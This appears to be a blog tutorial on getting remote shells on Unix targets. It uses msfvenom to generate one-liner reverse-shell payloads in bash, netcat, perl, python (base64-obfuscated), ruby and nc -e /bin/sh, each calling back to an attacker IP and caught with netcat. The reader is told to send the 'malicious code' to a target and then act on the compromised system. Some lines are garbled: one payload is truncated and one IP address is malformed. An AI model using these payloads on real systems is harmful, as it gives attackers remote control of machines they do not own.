Hello friends!! Today you will learn how to spawn a TTY reverse
shell through netcat by using single line payload which is also known as
stagers exploit that comes in metasploit.
Basically there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired
terminal on a serial connection connected to
mouse or keyboard and PTs is suedo
tty terminal, to get the copy of terminals on network connections via
SSH or telnet.
Let’s start!!
Attacker: Kali
Linux
Target: Ubuntu
Open the terminal in your kali Linux and type
msfconsole to load metasploit framework, now search all one-liner
payloads for UNIX system using search
command as given below, it will dump all exploit that can be used to compromise
any UNIX system.
search cmd/unix
From given below image you can observed that it has dump
all exploit that can be used to compromised any UNIX system. In this tutorial we
are going to use some of payloads to spawn a TTY shell.
Compromise Bash shell
In order to compromise a bash shell you can use reverse_bash
payload along msfvenom as given in below
command.
msfvenom –p cmd/unix/reverse_bash lhost=192.168.1.103
lport=1111 R
Here we had entered following detail to generate one-liner raw
payload.
-p : type of
payload you are using i.e. cmd/unix/reverse_bash
Lhost:
listening IP address i.e. Kali Linux IP
Lport:
Listening port number i.e. 1111 (any random port number which is not utilized
by other services)
R: Its stand
for raw payload
As shown in below image,
the size of generated payload is 67 bytes, now copy this malicious code
and send it to target. After that start netcat for accessing reverse connection
and wait for getting his TTy shell.
For example when target
will open (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh
<&121 >&121 2>&121>) malicious code in
terminal, attacker will get reverse shell
through netcat.
nc -lvp 1111
As you can observe the result from given below image
where attacker has successfully accomplish targets system TTY shell, now he can
do whatever he wish to do.
For example:
whoami: it
tells you are root user of the system you have compromised.
Compromise Netcat shell
In order to compromise a netcat shell you can use reverse_netcat payload along msfvenom as given in below
command.
msfvenom -p cmd/unix/reverse_netcat
lhost=192.168.1.103 lport=2222 R
Here we had entered following detail to generate one-liner raw
payload.
-p : type of
payload you are using i.e. cmd/unix/reverse_netcat
Lhost:
listening IP address i.e. Kali Linux IP
Lport:
Listening port number i.e. 2222 (any random port number which is not utilized
by other services)
R: Its stand
for raw payload
As shown in below image, the size of generated payload is
104 bytes, now copy this malicious code and send it to target. After that start
netcat for accessing reverse connection and wait for getting his TTY shell.
when target will open ( mkfifo /tmp/admoszx; nc 192.168.1.103 2222
0
nc -lvp 2222
As you can observe the result from given below image where
attacker has successfully accomplish targets system TTY shell.
Compromise Perl shell
In order to compromise a perl shell you can use reverse_perl payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103
lport=3333 R
Here we had entered following detail to generate one-liner raw
payload.
-p : type of
payload you are using i.e. cmd/unix/reverse_perl
Lhost:
listening IP address i.e. Kali Linux IP
Lport:
Listening port number i.e. 3333 (any random port number which is not utilized
by other services)
R: Its stand
for raw payload
As shown in below image, the size of generated payload is
232 bytes, now copy this malicious code and send it to target. After that start
netcat for accessing reverse connection and wait for getting his TTY shell.
Now again when target will
open (perl -MIO -e '$p=fork;exit,if($p);foreach
my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new
IO::Socket::INET(PeerAddr,"192.168.1.103:3333");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~
/(.*)/){system $1;}};) ) malicious code in terminal, attacker will get reverse shell through netcat.
nc -lvp 3333
As you can observe the result from given below image where
attacker has successfully accomplish targets system TTY shell. Here we found
target IP address: 192.168.1.1106 by executing ifconfig command in his TTY shell.
Compromise Python shell
In order to compromise a python shell you can use reverse_Python payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_python
lhost=192.168.1.103 lport=4444 R
Here we had entered following detail to generate one-liner raw
payload.
-p : type of
payload you are using i.e. cmd/unix/reverse_python
Lhost:
listening IP address i.e. Kali Linux IP
Lport:
Listening port number i.e. 4444 (any random port number which is not utilized
by other services)
R: Its stand
for raw payload
As shown in below image, the size of generated payload is
533 bytes, now copy this malicious code and send it to target. After that start
netcat for accessing reverse connection and wait for getting his TTY shell.
Again when the target will
open the following malicious code in his terminal, attacker will get reverse
shell through netcat.
python -c
"exec('aW1wb3J0IHNvY2tldCAgICAgICAgICwgICAgICAgIHN1YnByb2Nlc3MgICAgICAgICAsICAgICAgICBvcyAgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguMS4xMDMiICAgICA7ICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICAgICAgLCAgICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICAgICAgICwgICAgICAgIHBvcnQpKSAgICAgOyAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgICwgICAgICAgIDApICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAgLCAgICAgICAgMSkgICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICAsICAgICAgICAyKSAgICAgOyAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
nc -lvp 4444
As you can observe the result from given below image
where attacker has successfully accomplish targets system TTY shell, now he can
do whatever he wish to do.
For example:
ifconfig: it
tells IP configuration of the system you have compromised.
Compromise Ruby shell
In order to compromise a ruby shell you can use reverse_ruby payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103
lport=5555 R
Here we had entered following detail to generate one-liner raw
payload.
-p : type of
payload you are using i.e. cmd/unix/reverse_ruby
Lhost:
listening IP address i.e. Kali Linux IP
Lport:
Listening port number i.e. 5555 (any random port number which is not utilized
by other services)
R: Its stand
for raw payload
As shown in below image, the size of generated payload is
131 bytes, now copy this malicious code and send it to target. After that start
netcat for accessing reverse connection and wait for getting his TTY shell.
Again when the target will
open (ruby -rsocket -e 'exit if
fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print
io.read}end') malicious code in his terminal, attacker will get reverse
shell through netcat.
As you can observe the result from given below
image where attacker has successfully accomplish targets system TTY shell, now
he can do whatever he wish to do.
For example:
ifconfig:
it tells IP configuration of the system you have compromised.
Compromise bin/sh shell
In order to compromise a command shell you can use reverse_netcat_gaping payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_netcat_gaping
lhost=192.168.1.103 lport=6666 R
Here we had entered following detail to generate one-liner raw
payload.
-p : type of
payload you are using i.e. cmd/unix/reverse_netcat_gaping
Lhost:
listening IP address i.e. Kali Linux IP
Lport:
Listening port number i.e. 6666 (any random port number which is not utilized
by other services)
R: Its stand
for raw payload
As shown in below image, the size of generated payload is
533 bytes, now copy this malicious code and send it to target. After that start
netcat for accessing reverse connection and wait for getting his TTY shell.
In order to access bin/sh
shell of target system for compromising TTY shell firslty we had access PTs termianl of target through SSH and then past the malicious
code (nc 192.168.1.103 6666 -e /bin/sh
) inside PTY terminal.
nc -lvp 6666
From given below image you can observe that we had
successfully access TTy shell of target system.
0 comments:
Post a Comment